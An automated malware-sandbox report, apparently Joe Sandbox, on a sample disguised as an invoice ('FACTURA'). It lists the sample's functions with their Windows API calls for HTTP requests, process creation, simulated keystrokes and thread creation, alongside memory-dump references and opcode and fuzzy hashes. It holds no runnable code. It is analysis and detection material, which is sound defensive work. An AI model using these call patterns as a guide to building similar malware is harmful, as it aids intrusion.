                                                                            • Instruction ID: b4e00e66ddd5136f258d8dd7a296ca509612d4a8504a8e21abd6bae4c95cb3f1
                                                                            • Opcode Fuzzy Hash: 2b7e894197dcd9fe5ab544225e360fe080ec5159c11fe0d58c5547d7b17e0a9e
                                                                            • Instruction Fuzzy Hash: 78A16A31701216CFCB18EF14C9A4AA9F3A4EF45714F1452AEE80ABB362DB30AD56DF50
                                                                            Function 00F2A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00F2A439), ref: 00F2A377
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: 14124ebe1d4b0637b358b978a75a6e923accb3fc8b1e8735c82f47c9fa1e0331
                                                                            • Instruction ID: 1c1417f34ee0cdaeee4a8485b7de3618d2c1b460f299c65dc0e195a2f5635a93
                                                                            • Opcode Fuzzy Hash: 14124ebe1d4b0637b358b978a75a6e923accb3fc8b1e8735c82f47c9fa1e0331
                                                                            • Instruction Fuzzy Hash: 8C91F731A00A19EBCB08EFA0D441BEDFBB5FF04310F509119D959B7282DF31A999EB91
                                                                            Function 00ED2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00ED2EAE
                                                                              • Part of subcall function 00ED1DB3: GetClientRect.USER32(?,?), ref: 00ED1DDC
                                                                              • Part of subcall function 00ED1DB3: GetWindowRect.USER32(?,?), ref: 00ED1E1D
                                                                              • Part of subcall function 00ED1DB3: ScreenToClient.USER32(?,?), ref: 00ED1E45
                                                                            • GetDC.USER32 ref: 00F0CD32
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F0CD45
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F0CD53
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F0CD68
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F0CD70
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F0CDFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: e1d2bdd0101b59c3fc0ab0cc3f5b8c94ed2bad8c267a137d0796662954e64b33
                                                                            • Instruction ID: ec9f7fb0e21238401fe622efdeed99dcc82173098d482c8390931e636955ecd4
                                                                            • Opcode Fuzzy Hash: e1d2bdd0101b59c3fc0ab0cc3f5b8c94ed2bad8c267a137d0796662954e64b33
                                                                            • Instruction Fuzzy Hash: 7871C431900209DFCF218F64CC84AEA7BB5FF58325F14436AEE556B2A6C7319842FB90
                                                                            Function 00F41A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F41A50
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F41A7C
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F41ABE
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F41AD3
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41AE0
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F41B10
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F41B57
                                                                              • Part of subcall function 00F42483: GetLastError.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F42498
                                                                              • Part of subcall function 00F42483: SetEvent.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F424AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 87f926fb372b02a6b386ddb28345e2bf8b101fb3ba4de1f61fe9c35d36955b2d
                                                                            • Instruction ID: 4e5a5d6ab17c993d8beaa72e1ffcd4ddf11cc09b69373c3afda84085e740dca3
                                                                            • Opcode Fuzzy Hash: 87f926fb372b02a6b386ddb28345e2bf8b101fb3ba4de1f61fe9c35d36955b2d
                                                                            • Instruction Fuzzy Hash: F7416CB1901219BFEB119F50CC89FBA7FACFB48354F00416AFE059A151E7749E84ABA0
                                                                            Function 00F48C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F5F910), ref: 00F48D28
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F5F910), ref: 00F48D5C
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F48ED6
                                                                            • SysFreeString.OLEAUT32(?), ref: 00F48F00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: be630b99afa230c628483fa667c8afffca89cbb07967210695104703e56f8010
                                                                            • Instruction ID: fd6ec04379e4e4ce752dc3748df011ebf273865baa2e639e6c033cb0cbb3fc7c
                                                                            • Opcode Fuzzy Hash: be630b99afa230c628483fa667c8afffca89cbb07967210695104703e56f8010
                                                                            • Instruction Fuzzy Hash: C9F15C71A00209EFCF14DFA4C884EAEBBB9FF45355F108498F906AB251DB71AE46DB50
                                                                            Function 00F4F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4F6B5
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F848
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F86C
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F8AC
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F8CE
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4FA4A
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F4FA7C
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4FAAB
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4FB22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: 5b1f8b9e1a91cbd2ffc3c7d25a121da65dba9878c17e22147d94e7ff354fcf51
                                                                            • Instruction ID: c3825021c1dd10adb5748a5a866ce7723e2825921ad3f5c991f20043b17dcfc9
                                                                            • Opcode Fuzzy Hash: 5b1f8b9e1a91cbd2ffc3c7d25a121da65dba9878c17e22147d94e7ff354fcf51
                                                                            • Instruction Fuzzy Hash: 38E1C1316043409FC714EF24C881B6ABBE1EF85364F14846DF9899B3A2CB35EC49DB52
                                                                            Function 00ED201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2036,?,00000000,?,?,?,?,00ED16CB,00000000,?), ref: 00ED1B9A
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED20D3
                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00ED16CB,00000000,?,?,00ED1AE2,?,?), ref: 00ED216E
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00F0BCA6
                                                                            • DeleteObject.GDI32(00000000), ref: 00F0BD1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 2402799130-0
                                                                            • Opcode ID: 7d4ca2edfe5ad9e107a1e883acdfaab5036f83300764b6e6e00a95f23bdacb0b
                                                                            • Instruction ID: e0a1be3edb58487fad441124e7e95ce76c16cb9912b3cd63828493c30ddd9371
                                                                            • Opcode Fuzzy Hash: 7d4ca2edfe5ad9e107a1e883acdfaab5036f83300764b6e6e00a95f23bdacb0b
                                                                            • Instruction Fuzzy Hash: 6061AE30501B08DFDB36AF14D948B2AB7F1FF50716F10952EE642AA6B0C770A886FB50
                                                                            Function 00F34CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33697,?), ref: 00F3468B
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33697,?), ref: 00F346A4
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F34D40
                                                                            • _wcscmp.LIBCMT ref: 00F34D5A
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F34D75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: c1a6617c5654d1fe6b20a46d88103f4908967f1c7616ce643758135b53aa71a4
                                                                            • Instruction ID: a2ef7f7af2c4ecffb2b88249f041340f1f7f26f03646f93325d7851484a77824
                                                                            • Opcode Fuzzy Hash: c1a6617c5654d1fe6b20a46d88103f4908967f1c7616ce643758135b53aa71a4
                                                                            • Instruction Fuzzy Hash: 8D5143B24083459BC724DBA4DC819DFB3ECAF85360F00092EB689D3151EF35B689D766
                                                                            Function 00F58645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F586FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: e3930a50dc86e9fe7469071b6c846d5f7da568f3f76447207b1450f051fa92ed
                                                                            • Instruction ID: ebe2f96ebf610fee3b6d7f42b15d5b79790cfb6d21b10cbd06ebc00a078f08ec
                                                                            • Opcode Fuzzy Hash: e3930a50dc86e9fe7469071b6c846d5f7da568f3f76447207b1450f051fa92ed
                                                                            • Instruction Fuzzy Hash: B151A131900244BFEB209B25DC85F9D3BA4EB057A2F604116FF51F61A1CF71AD8AEB41
                                                                            Function 00ED2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F0C2F7
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0C319
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F0C331
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F0C34F
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F0C370
                                                                            • DestroyCursor.USER32(00000000), ref: 00F0C37F
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F0C39C
                                                                            • DestroyCursor.USER32(?), ref: 00F0C3AB
                                                                              • Part of subcall function 00F5A4AF: DeleteObject.GDI32(00000000), ref: 00F5A4E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2975913752-0
                                                                            • Opcode ID: 3839d6cc36a5ba03c816e0b85a3c6224b7e139553d50477eaf89c547b4411642
                                                                            • Instruction ID: c0bb2bd0273be20019cd1a87fddfde585f52b31e310fd37541d3c02f6125ee4a
                                                                            • Opcode Fuzzy Hash: 3839d6cc36a5ba03c816e0b85a3c6224b7e139553d50477eaf89c547b4411642
                                                                            • Instruction Fuzzy Hash: F8516E70A10709EFDB20DF64CC45BAA77E5EB54721F10462EFA02A72D0D7B0AD51EB90
                                                                            Function 00F2966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F2A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2A84C
                                                                              • Part of subcall function 00F2A82C: GetCurrentThreadId.KERNEL32 ref: 00F2A853
                                                                              • Part of subcall function 00F2A82C: AttachThreadInput.USER32(00000000,?,00F29683,?,00000001), ref: 00F2A85A
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2968E
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F296AB
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F296AE
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F296B7
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F296D5
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F296D8
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F296E1
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F296F8
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F296FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 2c5346b8ab5c10150e400a6ab55dd529090fc6be296828b6e0ee65403dbec614
                                                                            • Instruction ID: 9de39db2cc269f1162521432e1cfdff60fd53e177695487b536e18dcd114f454
                                                                            • Opcode Fuzzy Hash: 2c5346b8ab5c10150e400a6ab55dd529090fc6be296828b6e0ee65403dbec614
                                                                            • Instruction Fuzzy Hash: 3911A1B1950618BFF6106F60EC89F6A7F6DEB4C752F110465F344AB0A1C9F25C50EAA4
                                                                            Function 00F28921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00F2892A
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F28931
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F28946
                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00F2894E
                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00F28951
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00F28961
                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00F28969
                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00F2896C
                                                                            • CreateThread.KERNEL32(00000000,00000000,00F28992,00000000,00000000,00000000), ref: 00F28986
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1422014791-0
                                                                            • Opcode ID: d71d1f0de7b5b61047582e69dbd50eb5f99a16cf607d68dad8a910cd36409742
                                                                            • Instruction ID: 786486f8f8891e0b38895635381e60934a72096b1c79d9696e7e884d078f9557
                                                                            • Opcode Fuzzy Hash: d71d1f0de7b5b61047582e69dbd50eb5f99a16cf607d68dad8a910cd36409742
                                                                            • Instruction Fuzzy Hash: B701BBB5240748FFE710ABA5DC4DF6B3BACEB89711F408461FB05DB1A1CA709804DB21
                                                                            Function 00F49B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 785581cff1f3a44efdaf24d2a85784e69717dd9f9dcf9e29f2b1960d951b4d56
                                                                            • Instruction ID: 04260fb2a84360a451f167cc0c2d4bd5f75bf381ee010bde33334c2f860f99d9
                                                                            • Opcode Fuzzy Hash: 785581cff1f3a44efdaf24d2a85784e69717dd9f9dcf9e29f2b1960d951b4d56
